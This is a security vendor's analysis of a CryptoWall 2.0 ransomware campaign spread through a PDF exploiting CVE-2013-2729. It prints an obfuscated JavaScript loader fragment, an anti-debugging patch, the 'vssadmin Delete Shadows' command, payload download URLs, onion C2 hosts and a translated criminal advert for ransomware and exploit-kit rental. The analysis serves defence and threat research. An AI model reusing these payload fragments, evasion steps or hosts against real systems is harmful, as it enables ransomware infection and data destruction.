CryptoWall – Capturing The Threat

Background

Cryptowall is an aggressive form of malware designed to infect a computer and steal its data. Once Cryptowall infects a computer, attackers steal the data and lock it behind an encryption wall. To unlock the data, victims are forced to pay a ransom fee.
Various forms of Cryptowall exist; in this blog post we focus on a form that sends a malicious email attachment (in the form of a PDF) to a large group.
We investigate how this form of Cryptowall works, who is behind it, and what its victims will experience. We also illustrate how SentinelOne Endpoint Protection Platform (EPP) identifies the attack and prevents it from stealing any data.

Capturing the Threat

The spam email has a PDF as an attachment.
We submitted the file –
dd8c76800dc57fea9a8ef0ee79e11c532 505fb9ce2c6f561f78589145250888e – to VirusTotal, which told us the PDF had a readable name: fax­id918.pdf
Based on this information, we can assume spam emails are used to spread the majority of the malware.
The files in email attachments are usually zipped (in order to bypass blacklisting from anti­spam/e­mail security solutions).
The most common trick is to rename an .exe file as a .scr or .pif file, and then zip it because Windows will still execute it normally. Users are usually aware that .exe can be malicious, but almost never know other PE extensions.
In this case, since the malware is in a single PDF, we can assume it contains some sort of exploit. Also because VirusTotal has numerous references to it, we can assume it was not a zero­day attack. Finally, experience shows that malware groups will not “waste” zero­days on random email phishing attacks.
All of which leads to three assumptions:

  • The file is not part of a targeted attack, but more like a wide “the more you spam, the more you get” campaign.
  • We already have the first lead – the attachment in a spam email – so we don’t have to look for more evidence demonstrating how the user could possibly get this file.
  • The filetype is PDF. Given the history of old versions of Adobe Reader, the exploit is probably common.

Into The Analysis

Let’s try to back our assumptions with facts starting from static analysis. Peepdf should help us with the first steps.
The first step is to load the file and check its streams and objects.

File: fax­id918.pdf
MD5: f5a8aaca1ea6b4d8c9cf93085b155bbb
SHA1: 9e45979dcdaecbd014060b79c2dee2258ca82943
Size: 476644 bytes
Version: 1.5
Binary: True
Linearized: False
Encrypted: False
Updates: 0
Objects: 6
Streams: 2
Comments: 0
Errors: 1
Version 0: Catalog: 3 Info: No
Objects (6): [1, 2, 3, 4, 5, 6] Streams (2): [1, 6]
Encoded (1): [1] Objects with JS code (1): [1] Suspicious elements:
/AcroForm: [3] /XFA: [2]
BMP/RLE heap corruption (CVE­2013­2729): [1]
Peepdf found something. We will try to extract the file and take a closer look.
PPDF> object 1 > dump.txt
dump.txt > 91562021 bytes.
Clearly, something looks malicious, since no legitimate 500K PDF should be decompressed to 90MB.
Inside, we see a very long, obfuscated piece of JavaScript:
var sbV8I = "5t5in55f5o55har5o5ee5a5u5es5a5e";
var upd = "Srg.rmCCdvlncp";
var upd0sbV8I = ""; var ii = 0;
for (var i=0; i < sbV8I.length; i++)
{
if(sbV8I[i] != "5") upd0sbV8I += sbV8I[i]; else
upd0sbV8I += upd[ii++];
}
var saddfg = /*sddsbV8Ifgdfg*/"slice";
var TMk = gJ(upd0sbV8I[saddfg](19,23)/*sddsbV8Ifgdfg*/);
var dr = /*sddsbV8Ifgdfg*/TMk(upd0sbV8I[saddfg](23)/*sddsbV8Ifgdfg*/);
var YB = [0x33,0x77,0x6A,0x75,0x71,0x66,0x68,0x6A];
var z3 = [0x5C, 0x64, 0x5D, 0x2F, 0x67, 0x2C, 0x27, 0x27, 0x29]; var z4 = [0x5D, 0x2F, 0x67, 0x2C, 0x27, 0x2C, 0x27, 0x29];
var z1 = [0x28, 0x2F, 0x5B, 0x5E, 0x5C, 0x78, 0x32, 0x46];
for(var q = 0; q < YB.length; q++) eMf += String.fromCharCode(YB[q]­5);
var z2 = [0x28, 0x2F, 0x5B, 0x5C, 0x78, 0x32, 0x46];
var aR = "n" + eMf + a2c(z1) + a2c(z3); var J0FdY = "m" + eMf + a2c(z2) + a2c(z4);

Where the real shellcode, using the function below, extracts from the base64 BMP image

TMk(pSHEP(xfa.resolveNode("Text101").rawValue));
‘pSHEP’ is the one that does the unpacking, and TMk will later be used for ‘eval’, after all the junk is calculated from the spahjetti z1, z3, and so on.

Further Investigation

Since it is clear that the PDF is malicious, we will proceed to dynamic analysis using a vulnerable version of Adobe reader, 9.4.0.

Luckily, the file was still online when we opened the PDF. We downloaded an additional .exe file from:
ripchordwebsolutions.com/wp­content/themes/lightweight/123.
Now let’s check 123.exe (0ca6317d50f91b74ba2a115dc4518803).
IDA Imports suggests that we have GetCurrentDirectoryA, CreateFileW, and GetStartupInfoW. There is no network or disk-related API calls, or anything else that might suggest that this is the “actual” malicious binary.

Usually, when we see this type of pattern, the binary is highly obfuscated and dynamically unpacks itself in the memory during runtime. This makes it difficult to perform static analysis..
PeiD and Yara didn’t show any common packer, so we will assume it is custom made.
GetWindowTextA suggests that anti­debugging techniques, such as looking for open OllyDbg/Procmon windows, might be used.
When we execute the file under Ollydbg, it stops on MOVZX EDX, WORD. This suggests that a PEB.BeingDebugged Flag is being checked – more commonly known as IsDebuggerPresent().
There are many Olly plugins to defeat this, but for now we will just inject a few instructions that will ensure the flag is patched:
and return 0.
mov eax,dword ptr fs:[18]
mov eax,dword ptr ds:[EAX+30] mov byte ptr ds:[eax+2]

Additional Binary Drop

After the process executes, it melts itself and copies into the Startup directory, a tactic that conceals it from msconfig or registry startup analysis tools. It’s a directory that has existed since Windows 9:
C:Documents and SettingsAdminStart MenuProgramsStartup4df616c.exe
Now it looks like we have some new “noise” on the system, since there is a new process vssadmin.exe Delete Shadows /All /Quiet being executed.

Also, the windows security service is disabled using the service stop command.
Now it will load additional components, from one of the compromised WordPress site URLs below, in random order:
artpartner.cz/o5l5ujx2f
www.areaverda.com/blog­trabajos/n65dj17i1836
www.mg­unterburg.ch/wordpress/f0k1ats
www.grekiskaforeningen.com/wp­content/themes/jarrah/ghd4vowtha0s.bin
www.cup­neumann.de/z6lub76lz295x
www.jes.or.at/jesneu/wp­content/themes/Girl/0l9u4lc6che
www.yemekyapmak.com/kf4bv
www.projetorideal.com.br/site/hr38xc4
www.rock­times.com/l449jbc0
www.felixwoman.com/wp­content/themes/
www.drk­wettringen.de/wordpress/3uh2e
www.houselifesupport.com/5gr4hl2tvv1
eportfolio.ccpullman.ca/blog/eo7ycomyy
www.fdp­aue­schwarzenberg.de/wp­content/themes/fdp­asz/vrf8iu
www.jimcole.be/s5eroewr
www.mcgownguild.com/u2m8bbkln3fqpe
www.footstepsphotography.co.uk/blog/f040z4d5d21z5rd s431_Blue/bh7u09cpppg5h www.sportantiques.co.uk/blog/c8w5kp1 www.meihuainfo.com/wp­content/themes/mh/3sbgwh HTTP/1.1
www.choosingcruising.co.uk/blog/wp­content/themes/the­beach­house/6k8elm10.bin

Just in case, we downloaded all the files from the URLs to make sure they are identical (they were). The large number of URLs used is for backup purposes, in case one of the webmasters takes it down.
First, we were directed to:
http://eportfolio.ccpullman.ca/blog/eo7ycomyy
And from there a 403. Then we continued to:
www.mg­unterburg.ch/wordpress/f0k1ats and got a 550Kb file (6e18aca92592895d10a9825b6aa40dcd).

Investigating The Network Traffic

A new process called “svchost.exe” will be created, injected with the newly downloaded Tor binary.
After loading, this string:
“crypt1800­98D81A3CEB88E5FD6054EB2A9C4C3703”
is sent to:
crptarv4hcu24ijv.onion
crptbfoi5i54ubez.onion
crptcj7wd4oaafdl.onion
crptdtykhkmux333.onion

(Tor onion addresses)
Using the user agent:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
together with our external IP.
In order to detect the user’s IP and country, a free service, http://wtfismyip.com/text, is used.That IP is sent to the C&C.

A Look From The Victim’s  Perspective

About a minute later, a Cryptowall 2.0 web page appeared, claiming  making a ransom payment
would decode the files.
The malicious PDF contained a highly obfuscated shellcode with CVE­2013­2729. The particular CVE is not part of the attack analysis, but it is important to mention that, according to Adobe, it affects a very large number of commonly used versions:
https://www.adobe.com/support/security/bulletins/apsb13­15.html
Adobe Reader XI (11.0.02) and earlier 11.x versions for Windows and Macintosh
Adobe Reader X (10.1.6) and earlier 10.x versions for Windows and Macintosh
Adobe Reader 9.5.4 and earlier 9.x versions for Windows, Macintosh and Linux
Adobe Acrobat XI (11.0.02) and earlier 11.x versions for Windows and Macintosh
Adobe Acrobat X (10.1.6) and earlier 10.x versions for Windows and Macintosh
Adobe Acrobat 9.5.4 and earlier 9.x versions for Windows and Macintosh
It is also worth mentioning that there was no third party “downloader” involved in this attack, and that we received a CryptoWall directly without  a binary infection that typically would make our machine part of a botnet.
Because of this information, we  there is a high probability that the same group is behind  both samples. Unlike cases where exploits are used to build a botnet first, and then sell the machines to another group that wants to load specific kinds of malware later.

Additional Intelligence Info

The hacker in this example it’s very known Russian affiliate, they work by the “Pay­per install” model.
The domains that are used for payment collecting,
tor4pay.com
tor2pay.com
pay4tor.com
pay2tor.com
These domains are registered and hosted on reg.ru, which is the Russian equivalent of GoDaddy.
Domain Name: TOR4PAY.COM
Registrar: REGISTRAR OF DOMAIN NAMES REG.RU LLC
Whois Server: whois.reg.ru
Referral URL: http://www.reg.ru
Name Server: NS1.REG.RU
Name Server: NS2.REG.RU
Status: clientTransferProhibited
Updated Date: 23­oct­2014
Creation Date: 08­oct­2014
Expiration Date: 08­oct­2015
The hackers set up a free tor2web gateway to make the process of accessing onion hidden services easier for the victims.
The hackers are the same group behind the “HiMan” exploit kit, which was later re-branded as “RIG.”

Roughly translated, the above thread reads:
A set on a beta test kriptolokera + rental locker
Description: Stable work on all windows family from 2000 to 8.1 (including 64 bit versions). Easy admin panel, no Shave, all payment information is entered by the user appears
Once in the statistics.
Availability of service for razlok. (Separate site if you remove Antivirus bot) Kriptoloker encrypts files using RSA (2 keys, public and private)
If the computer has been shut down or rebooted,
Deciphering continues from the same point where it was interrupted. Encrypted around ~ 80 extensions, aimed mostly at the biz.
Absolutely new modern base bot no zevsopodobnyh bypassing popular AB
Requirements adverts:
1) Demonstration of the presence of traffic or downloads for tests desirable USA and UK (desirable biz profile)
2) Patience honesty and integrity
At the time of the beta test with adverts will not charge any commission, and after the full launch of the commission will be half the rate (15%).
Payments accepted: Bitcoin (specify possibly your wallet)
Litecoin (similarly)
Moneypak
Ukash
PaySafeCard
Also you can rent a locker similar base
Bot tenacious, hard built into the system, runs on all windows family from 2000 to 8.1 (including 64 bit versions).
At the moment, willing to accept only adult USA traf
For ALL adverts we offer Rent Exploit Pack HiMan
High levels of support are always clean exploits (cleanliness sploitov monitors dedicated people) IE sploit PDF Flash Silver as well as Java exploits (included by necessity due to the high level of yellow with popup blocking)
Always clean Domains
Automatic generation of links issue Automatic verification domains palevnost Automatic check on the EXE palevnost
Ability to simultaneously ship in ten streams dozen different exe
And whoever wants to add a few dollars and rent an exploit pack, is welcome to do so in the same thread.

SentinelOne EPP Put To The Test

We wanted to see how our EPP solution will react to this zero day sample, so we tested it on a version released 2 months ago (and installed last month).

We used the latest variant of this sample we could find when writing this blog, and it was a sample that was first submitted to VirusTotal on Aug 14th and only recognized by 3 AVs at that time (about 40 recognize it today).

The sample was detected and threat killed before any encryption was even made to any file in our harddrive, most interesting to see some of the dynamic forensics view available for the tested sample.

Summary

This variant is from a family of ransomware kits we saw last year.
They offer a fake anti-virus program,or present a warning from law eenforcement aboutcriminal activity on the victim’s machine. Then ddemand apayment ranging from $100 to $200.
Today, cybercriminals prefer to get their revenue from their victims using techniques that are more offensive.
In the case presented above, the hackers compromised a large amount of important files, prompting them to charge anywhere from $500 to $1000 per victim.